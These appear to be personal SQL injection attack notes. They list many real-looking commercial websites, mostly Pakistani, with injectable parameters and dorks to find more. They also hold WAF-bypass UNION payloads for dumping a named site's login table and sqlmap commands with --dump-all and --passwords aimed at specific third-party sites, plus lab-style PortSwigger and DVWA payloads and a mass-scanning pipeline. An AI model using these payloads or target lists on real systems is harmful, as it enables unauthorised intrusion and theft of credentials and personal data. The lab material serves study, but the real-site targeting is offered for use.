https://codebeautify.org/string-hex-converter
https://rft.com.pk/content.php?p=3
https://www.avnsystems.com.pk/content.php?Id=6
https://www.madridsports.com.pk/content.php?Id=6
https://dakaan.pk/store.php?id=3
inurl:.products.php?cat= site:.pk
https://www.powerman.com.pk/products.php?cat=160
https://justsports.com.pk/products.php?catid=96-0
http://www.onewish.pk/products.php?cat=111
https://aquacity.com.pk/products.php?id=36
https://omc.com.pk/products.php?id=50
https://www.kirangroup.com.pk/products.php?id=1
https://tpe.com.pk/project-details.php?prodID=18
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.drawger.buglogic.com/edel/articles/14783
https://www.plgmea.pk/content.php?Id=66
https://homeshopping.pk/banks/Silk-Bank.html?catid=
https://www.bestmaal.pk/shop.php?id=15
https://apnidukan.pk/shop.php?category=13
inurl:.products.php?id= site:.pk
http://example.com/page.php?id=1
https://www.af.org.pk/publication-detail.php?id=7
https://homeshopping.pk/banks/Silk-Bank.html?catid=1
http://fmcpakistan.com.pk/index.php/products?category=5
 https://binhouse.pk/shop.php?prod_id=11061
http://www.embryohotel.com/room-detail.php?id=1
 https://www.af.org.pk/publication-detail.php?id=7
http://www.cmkoo.com.hk/en/news/news.php?id=28
https://www.native.edu.pk/detail.php?ComCatID=11
https://www.neutronics.co.in/products.php?id=7
https://www.dpi.uk.net/product_info.php?id=162
http://www.shihka.com.hk/en/product.php?catid=2
https://www.hintekindia.in/product.php?id=12

=========================================================================
#https://gitbook.robensive.in/anee/m1/s4/file-inclusion-to-rce
=========================================================================

WAF Bypass-
3 /*!50000UNION*/
5 /*!50000uNiON*/+/*!50000sELECT*/
8 user()
9 database()
10 version()
information_schema, aquacity_db

0x=hex value

10 Balance URL - [ --+ +- ]
To Find Columns - [' ORDER+BY+1 ] - we got 5 columns
To Find Vulnerable Columns - [' UNION+SELECT+1,2,3,4,5--+ ]
To Find Hidden Columns - [ AND+0 = '+AND+0+UNION+SELECT+1,2,3,4,5--+ ]
user() = 3
To Find All Database - [ (SELECT+GROUP_CONCAT(schema_name)+/*!50000FROM*/+/*!50000INFORMATION_SCHEMA*/.SCHEMATA) ]
To Find Tables Name [ (SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+/*!50000INFORMATION_SCHEMA*/.TABLES) ]
  aquacity_db = Name [ (SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+/*!50000INFORMATION_SCHEMA*/.TABLES+WHERE+TABLE_SCHEMA=0x61717561636974795f6462) ]
To Dump Column Name columnshex [ (SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+/*!50000INFORMATION_SCHEMA*/.COLUMNS+WHERE+TABLE_NAME=0x6c6f67696e) ]
To Dump Data - [ (SELECT+GROUP_CONCAT(email)+/*!50000FROM*/+aquacity_db.login) ]
des

aquacity_db
nmap
lbd
wafbof
burpsuit
id
pass
email
member_name
Gender


SQL injection attack, listing the database contents on Oracle

1) Determine the number of columns ' order by 3---> internal server error

2) Find data type of columns
' UNION select 'a', 'a' from DUAL-- -> Oracle database
-> both columns accept type text

3) Output the list of tables in the database
' UNION SELECT table_name, NULL FROM all_tables--
USERS_ENRFAB
USERNAME_PECGYL
PASSWORD_RZXUMK

4) Output the column names of the users table
' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = 'USERS JYPOMG' - -
USERNAME LDANZP
PASSWORD DYZWEQ

5) Output the list of usernames/passwords
' UNION select USERNAME_LDANZP, PASSWORD_DYZWEQ from USERS JYPOMG--


SQL injection attack, listing the database contents on non-Oracle databases
'+UNION+SELECT+'abc','def'--
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
'+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
users_adzesn
password_tnnhzs
username_bfxasv


SQL injection UNION attack, retrieving data from other tables
'+UNION+SELECT+'abc','def'--
'+UNION+SELECT+username,+password+FROM+users--


SQL injection UNION attack, retrieving multiple values in a single column
'+UNION+SELECT+NULL,'abc'--
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--


Tool :- sqlmap --help
https://github.com/r0oth3x49/ghauri
https://github.com/coffinxp/customBsqli
https://github.com/tiankonguse/themole


	sqlmap -u <url> <--dbs>
	sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=4 --dbms
	sqlmap -u <url> <-D(DatabaseName)> <--tables(for find table name in database) >
 	sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=4 -D acuart --tables
	sqlmap -u <url> <-D> <-T (give Table Name)> <--columns (for find columns in tables)>
	sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=4 -D acuart -T users --columns
	sqlmap -u <url> <-D> <-T> <-C (for column name which you want in tables like user and pass)>
	sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=4 -D acuart -T users -C uname,pass,phone --dump


Manually -->

-> target website:- testphp.vulnweb.com
-> find get parameter 
-> http://testphp.vulnweb.com/listproducts.php?cat=1  =&id=1'
                                                      or 1=1
                                                      and sleep(10)
-> Now find the numbers of columns in database. By using Order by commands.
    sign is for comment out the error on screen.
    Use Command #order by 1 --+ for checking 1 number columns
-> Use command #order by (column no. ) 
	#order by 15 --+

-> If 15 columns are not available then try less then 15.
-> then try #order by 11 --+
-> #union select 1,2,3,4,5,6,7,8,9,10,11 --+
-> #union select 1,database(),3,4,5,6,version(),8,9,10,11 --+
-> #union select 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables --+
-> #union select 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='users' --+
-> #union select 1,group_concat(uname,pass),3,4,5,6,7,8,9,10,11 from users

BEST SQLI METHODLOGY :
for single url:
python3 lostsec.py -u "https://cutm.ac.in/payu/skill/index.php?id=34" -p payloads/xor.txt -t 5
for multiple urls:
paramspider -d www.speedway.net.au -o urls.txt
cat output/urls.txt | sed 's/FUZZ//g' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5
echo testphp.vulnweb.com | gau --mc 200 | urldedupe >urls.txt
cat urls.txt| grep - ".php.asp.aspx.cfm|.jsp" | grep '=' | sort > output.txt -E |
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5
echo testphp.vulnweb.com | katana -d 5 -ps -pss waybackarchive, commoncrawl, alienvault -f qurl | urldedupe >output.txt
katana -u http://testphp.vulnweb.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5


#dvwa
' OR "='

extract password
' union select user, password FROM users--

hostname
' union select null,@@hostname #

current database
' union all select system_user(),user() #

database name
' union select null,database() #


https://www.plgmea.pk/content.php?Id=66%27%20UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+
sqlmap -u "http://example.com/page.php?id=1" \
--batch \
--level=5 \
--risk=3 \
--threads=10 \
--random-agent \
--dbs \
--current-db \
--current-user \
--is-dba \
--users \
--passwords \
--roles \
--
sqlmap -u "http://example.com/page.php?id=1" --batch --level=5 --risk=3 --threads=10 --random-agent --technique=BEUSTQ --dump-all
sqlmap -u https://www.af.org.pk/publication-detail.php?id=7 --batch
 sqlmap -u https://homeshopping.pk/banks/Silk-Bank.html?catid=1 --batch --dump-all
